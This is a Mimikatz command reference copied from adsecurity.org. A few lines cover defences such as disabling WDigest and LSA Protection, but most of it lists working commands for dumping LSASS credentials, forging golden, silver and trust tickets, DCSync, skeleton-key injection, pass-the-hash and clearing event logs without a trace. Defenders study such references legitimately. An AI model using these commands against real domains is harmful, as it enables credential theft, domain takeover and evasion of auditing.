The content of this page was copied adsecurity.org
Starting with Windows 8.1 and Windows Server 2012 R2, the LM hash and “clear-text” password are no longer in memory.
In order to prevent the “clear-text” password from being placed in LSASS, the following registry key needs to be set to “0” (Digest Disabled):
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest “UseLogonCredential”(DWORD)
Windows Server 2012 R2 and Windows 8.1 includes a new feature called LSA Protection which involves enabling LSASS as a protected process on Windows Server 2012 R2 (Mimikatz can bypass with a driver, but that should make some noise in the event logs):
The LSA, which includes the Local Security Authority Server Service (LSASS) process, validates users for local and remote sign-ins and enforces local security policies. The Windows 8.1 operating system provides additional protection for the LSA to prevent reading memory and code injection by non-protected processes. This provides added security for the credentials that the LSA stores and manages.
Enabling LSA protection:
LSA Protection prevents non-protected processes from interacting with LSASS. Mimikatz can still bypass this with a driver (“!+”).
EVENT::Clear – Clear an event log
EVENT:::Drop – (experimental) Patch Events service to avoid new events
Note:
Run privilege::debug then event::drop to patch the event log. Then run Event::Clear to clear the event log without any log cleared event (1102) being logged.
A Golden Ticket is a TGT using the KRBTGT NTLM password hash to encrypt and sign.
A Golden Ticket (GT) can be created to impersonate any user (real or imagined) in the domain as a member of any group in the domain (providing a virtually unlimited amount of rights) to any and every resource in the domain.
Mimikatz Golden Ticket Command Reference:
The Mimikatz command to create a golden ticket is “kerberos::golden”
Golden Ticket Default Groups:
.\mimikatz "kerberos::golden /User:Administrator /domain:rd.lab.adsecurity.org /id:512 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit
A Silver Ticket is a TGS (similar to TGT in format) using the target service account’s (identified by SPN mapping) NTLM password hash to encrypt and sign.
Example Mimikatz Command to Create a Silver Ticket:
The following Mimikatz command creates a Silver Ticket for the CIFS service on the server adsmswin2k8r2.lab.adsecurity.org. In order for this Silver Ticket to be successfully created, the AD computer account password hash for adsmswin2k8r2.lab.adsecurity.org needs to be discovered, either from an AD domain dump or by running Mimikatz on the local system as shown above (Mimikatz “privilege::debug” “sekurlsa::logonpasswords” exit). The NTLM password hash is used with the /rc4 paramteer. The service SPN type also needs to be identified in the /service parameter. Finally, the target computer’s fully-qualified domain name needs to be provided in the /target parameter. Don’t forget the domain SID in the /sid parameter.
mimikatz “kerberos::golden /admin:LukeSkywalker /id:1106 /domain:lab.adsecurity.org /sid:S-1-5-21-1473643419-774954089-2222329127 /target:adsmswin2k8r2.lab.adsecurity.org /rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /ptt” exit
Once the Active Directory Trust password hash is determined, a trust ticket can be generated. The trust tickets are created using the shared password between 2 Domains that trust each other.
****More background on Trust Tickets.
Dumping trust passwords (trust keys)
Mimikatz “privilege::debug” “lsadump::trust /patch” exit
Create a forged trust ticket (inter-realm TGT) using Mimikatz
Forge the trust ticket which states the ticket holder is an Enterprise Admin in the AD Forest (leveraging SIDHistory, “sids”, across trusts in Mimikatz, my “contribution” to Mimikatz). This enables full administrative access from a child domain to the parent domain. Note that this account doesn’t have to exist anywhere as it is effectively a Golden Ticket across the trust.
Mimikatz “Kerberos::golden /domain:child.lab.adsecurity.org /sid:S-1-5-21-3677078698-724690114-1972670770 /sids:S-1-5-21-1581655573-3923512380-696647894-519 /rc4:49ed1653275f78846ff06de1a02386fd /user:DarthVader /service:krbtgt /target:lab.adsecurity.org /ticket:c:\temp\tickets\EA-ADSECLABCHILD.kirbi” exit
Trust Ticket Specific Required Parameters:
KERBEROS::List – List all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current user’s tickets.
****Similar to functionality of “klist”.
KERBEROS::PTC – pass the cache (NT6)
*Nix systems like Mac OS, Linux,BSD, Unix, etc cache Kerberos credentials. This cached data can be copied off and passed using Mimikatz. Also useful for injecting Kerberos tickets in ccache files.
A good example of Mimikatz’s kerberos::ptc is when exploiting MS14-068 with PyKEK. PyKEK generates a ccache file which can be injected with Mimikatz using kerberos::ptc.
KERBEROS::PTT – pass the ticket
After a Kerberos ticket is found, it can be copied to another system and passed into the current session effectively simulating a logon without any communication with the Domain Controller. No special rights required.
Similar to SEKURLSA::PTH (Pass-The-Hash).
KERBEROS::Purge – purge all Kerberos tickets
Similar to functionality of “klist purge”. Run this command before passing tickets (PTC, PTT, etc) to ensure the correct user context is used.
KERBEROS::TGT – get current TGT for current user.
LSADUMP::DCShadow – Set the current machines as DC to have the habitability to create new objects inside the DC (persistent method).
This requires full AD admin rights or KRBTGT pw hash.
DCShadow temporarily sets the computer to be a “DC” for the purposes of replication:
LSADUMP::DCSync – ask a DC to synchronize an object (get password data for account)
Requires membership in Domain Administrator, domain Administrators, or custom delegation.
A major feature added to Mimkatz in August 2015 is “DCSync” which effectively “impersonates” a Domain Controller and requests account password data from the targeted Domain Controller.
DCSync Options:
There’s also a /guid parameter.
DCSync Command Examples:
Pull password data for the KRBTGT user account in the rd.adsecurity.org domain:
Mimikatz “lsadump::dcsync /domain:rd.adsecurity.org /user:krbtgt” exit
Pull password data for the Administrator user account in the rd.adsecurity.org domain:
Mimikatz “lsadump::dcsync /domain:rd.adsecurity.org /user:Administrator” exit
Pull password data for the ADSDC03 Domain Controller computer account in the lab.adsecurity.org domain:
Mimikatz “lsadump::dcsync /domain:lab.adsecurity.org /user:adsdc03$” exit
LSADUMP::LSA – Ask LSA Server to retrieve SAM/AD enterprise (normal, patch on the fly or inject). Use /patch for a subset of data, use /inject for everything. Requires System or Debug rights.
Often service accounts are members of Domain Admins (or equivalent) or a Domain Admin was recently logged on to the computer an attacker dump credentials from. Using these credentials, an attacker can gain access to a Domain Controller and get all domain credentials, including the KRBTGT account NTLM hash which is used to create Kerberos Golden Tickets.
mimikatz lsadump::lsa /inject exit
LSADUMP::NetSync
NetSync provides a simple way to use a DC computer account password data to impersonate a Domain Controller via a Silver Ticket and DCSync the target account’s information including the password data_._
LSADUMP::SAM – get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts.
LSADUMP::Secrets – get the SysKey to decrypt SECRETS entries (from registry or hives).
LSADUMP::SetNTLM – Ask a server to set a new password/ntlm for one user.
LSADUMP::Trust – Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly).
MISC::Skeleton – Inject Skeleton Key into LSASS process on Domain Controller.
"privilege::debug" "misc::skeleton"
PRIVILEGE::Backup – get backup privilege/rights. Requires Debug rights.
PRIVILEGE::Debug – get debug rights (this or Local System rights is required for many Mimikatz commands).
SEKURLSA::Credman – List Credentials Manager
SEKURLSA::Ekeys – list Kerberos encryption keys
SEKURLSA::Kerberos – List Kerberos credentials for all authenticated users (including services and computer account)
SEKURLSA::Krbtgt – get Domain Kerberos service account (KRBTGT)password data
SEKURLSA::SSP – Lists SSP credentials
SEKURLSA::Wdigest – List WDigest credentials
SEKURLSA::LogonPasswords – lists all available provider credentials. This usually shows recently logged on user and computer credentials.
SEKURLSA::Minidump – switch to LSASS minidump process context (read lsass dump)
SEKURLSA::Pth – Pass-the-Hash and Over-Pass-the-Hash (aka pass the key).
Mimikatz can perform the well-known operation ‘Pass-The-Hash’ to run a process under another credentials with NTLM hash of the user’s password, instead of its real password. For this, it starts a process with a fake identity, then replaces fake information (NTLM hash of the fake password) with real information (NTLM hash of the real password).
SEKURLSA::Tickets – Lists all available Kerberos tickets for all recently authenticated users, including services running under the context of a user account and the local computer’s AD computer account.
Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of others sessions (users).
Similar to credential dumping from LSASS, using the sekurlsa module, an attacker can get all Kerberos ticket data in memory on a system, including those belonging to an admin or service.
This is extremely useful if an attacker has compromised a web server configured for Kerberos delegation that users access with a backend SQL server. This enables an attacker to capture and reuse all user tickets in memory on that server.
The “kerberos::tickets” mimikatz command dumps the current logged-on user’s Kerberos tickets and does not require elevated rights. Leveraging the sekurlsa module’s capability to read from protected memory (LSASS), all Kerberos tickets on the system can be dumped.
Command: mimikatz sekurlsa::tickets exit
The Mimikatz SID module replaces MISC::AddSID. Use SID::Patch to patch the ntds service.
SID::add – Add a SID to SIDHistory of an object
SID::modify – Modify object SID of an object
The Mimikatz Token module enables Mimikatz to interact with Windows authentication tokens, including grabbing and impersonating existing tokens.
TOKEN::Elevate – impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box using the Windows API.
Requires Administrator rights.
Find a domain admin credential on the box and use that token: token::elevate /domainadmin
TOKEN::List – list all tokens of the system
TS::MultiRDP – (experimental) Patch Terminal Server service to allow multiple users
TS::Sessions – List TS/RDP sessions.